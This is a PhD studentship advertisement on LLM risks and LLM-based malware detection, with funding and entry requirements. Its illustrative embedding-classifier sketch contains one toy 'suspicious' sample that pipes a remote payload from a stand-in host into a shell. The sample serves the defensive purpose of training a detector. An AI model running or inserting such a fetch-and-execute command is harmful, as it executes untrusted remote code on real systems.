Overview
As generative AI models, particularly large language models (LLMs), continue to advance, their potential applications in cybersecurity have attracted significant attention. These models are capable of both harmful and beneficial applications, raising important research questions about how they can be used to improve security postures while mitigating the associated risks. In offensive cybersecurity, LLMs can assist attackers by generating exploit code or supporting the discovery of zero-day vulnerabilities, a major concern for governments and organizations alike. Conversely, the deep knowledge extraction and hyperdimensional representation capabilities of these models offer promising solutions for malware detection and defense. This dual-use nature necessitates a comprehensive exploration of their cybersecurity applications, focusing on developing effective defenses against model misuse while exploring LLM capabilities for defensive applications. This research aims to bridge the gap between understanding the risks of LLMs in generating offensive tools and harnessing their potential for advanced malware detection.
Research Objectives
Objective 1: Analyze the risks and mechanisms by which code-generating LLMs could enable or support the discovery of zero-day vulnerabilities.
Objective 2: Develop methodologies for extracting cybersecurity-relevant information from code representations within LLMs, focusing on knowledge extraction, feature mapping, and pattern recognition.
Objective 3: Leverage LLMs to enhance malware detection by representing code and malicious activity in a hyperdimensional space, opening new avenues for identifying emerging threats.
Objective 4: Propose defense strategies to mitigate the misuse of generative models in offensive cybersecurity.
Research Questions
How can LLMs be leveraged to autonomously identify and potentially exploit vulnerabilities in code, and what controls are necessary to prevent their misuse?
In what ways can LLMs be trained to accurately represent benign and malicious code in hyperdimensional space for effective malware detection and classification? (An illustrative sketch of such a pipeline follows these questions.)
What feature extraction techniques are best suited for transforming LLM-based code embeddings into a structured form that aids in defensive applications?
What safeguards can be established to prevent malicious use of these models in generating zero-day vulnerabilities?
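As a rough illustration of the kind of pipeline suggested by Objective 3 and the embedding-related questions above, the Python sketch below maps code snippets into a high-dimensional embedding space with a pretrained code encoder and fits a simple classifier over the resulting vectors. The encoder name (microsoft/codebert-base), the toy samples and the logistic-regression classifier are assumptions made purely for illustration; they are not the project's prescribed method.

# Illustrative sketch only: LLM-derived code embeddings feeding a simple
# malicious/benign classifier. Model, data and classifier are placeholders.
import torch
from transformers import AutoTokenizer, AutoModel
from sklearn.linear_model import LogisticRegression

MODEL_NAME = "microsoft/codebert-base"  # assumed pretrained code encoder

tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME)
encoder = AutoModel.from_pretrained(MODEL_NAME)
encoder.eval()

def embed(code: str) -> torch.Tensor:
    """Map a code snippet to a fixed-size vector by mean-pooling hidden states."""
    inputs = tokenizer(code, return_tensors="pt", truncation=True, max_length=512)
    with torch.no_grad():
        hidden = encoder(**inputs).last_hidden_state  # (1, seq_len, hidden_dim)
    return hidden.mean(dim=1).squeeze(0)              # (hidden_dim,)

# Toy labelled corpus: 1 = suspicious pattern, 0 = benign (placeholders only).
samples = [
    ("import os; os.system('curl http://example.com/payload | sh')", 1),
    ("def add(a, b):\n    return a + b", 0),
]
X = torch.stack([embed(code) for code, _ in samples]).numpy()
y = [label for _, label in samples]

clf = LogisticRegression(max_iter=1000).fit(X, y)  # classifier over embeddings
print(clf.predict(X))                              # sanity check on the toy data

In a real study the pooled embedding, the choice of encoder and the downstream classifier would all be research variables; the point of the sketch is only to make the "code as a point in a high-dimensional space" framing concrete.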
Impact and Significance
This research has significant implications for both offensive and defensive cybersecurity. By understanding the offensive potential of generative models, it aims to address critical concerns around LLM misuse in vulnerability discovery. Meanwhile, developing defensive applications could lead to groundbreaking advancements in malware detection, leveraging LLMs to provide security experts with a powerful new tool for recognizing and analyzing malicious patterns. The proposal also addresses the ethical dimensions of AI, contributing to the responsible use of generative models in cybersecurity.
Funding Information
To be eligible for consideration for a Home DfE or EPSRC Studentship (covering tuition fees and a maintenance stipend of approx. £19,237 per annum), a candidate must satisfy all the eligibility criteria based on nationality, residency and academic qualifications.
To be classed as a Home student, candidates must meet the following criteria and the associated residency requirements:
• Be a UK National, or
• Have settled status, or
• Have pre-settled status, or
• Have indefinite leave to remain or enter the UK.
Candidates from ROI may also qualify for Home student funding.
Previous PhD study MAY make you ineligible to be considered for funding.
Please note that other terms and conditions also apply.
Please note that any available PhD studentships will be allocated on a competitive basis across a number of projects currently being advertised by the School.
A small number of international awards will be available for allocation across the School. An international award is not guaranteed to be available for this project, and competition for these awards across the School will be strong.
Academic Requirements:
The minimum academic requirement for admission is normally an Upper Second Class Honours degree from a UK or ROI Higher Education provider in a relevant discipline, or an equivalent qualification acceptable to the University.
Entrance requirements
Graduate
The minimum academic requirement for admission to a research degree programme is normally an Upper Second Class Honours degree from a UK or ROI HE provider, or an equivalent qualification acceptable to the University. Further information can be obtained by contacting the School.
International Students
For information on international qualification equivalents, please check the specific information for your country.
English Language Requirements
Evidence of an IELTS* score of 6.0, with not less than 5.5 in any component, or an equivalent qualification acceptable to the University, is required (*taken within the last 2 years).
International students wishing to apply to Queen’s University Belfast (and for whom English is not their first language) must be able to demonstrate their proficiency in English in order to benefit fully from their course of study or research. Non-EEA nationals must also satisfy UK Visas and Immigration (UKVI) immigration requirements for English language for visa purposes.
For more information on English Language requirements for EEA and non-EEA nationals see: www.qub.ac.uk/EnglishLanguageReqs.
If you need to improve your English language skills before you enter this degree programme, INTO Queen’s University Belfast offers a range of English language courses. These intensive and flexible courses are designed to improve your English ability for admission to this degree.
How to Apply
Apply using our online Postgraduate Applications Portal and follow the step-by-step instructions on how to apply.
Find a supervisor
If you’re interested in a particular project, we suggest you contact the relevant academic before you apply, to introduce yourself and ask questions.
To find a potential supervisor aligned with your area of interest, or if you are unsure of who to contact, look through the School's staff profiles.
You might be asked to provide a short outline of your proposal to help us identify potential supervisors.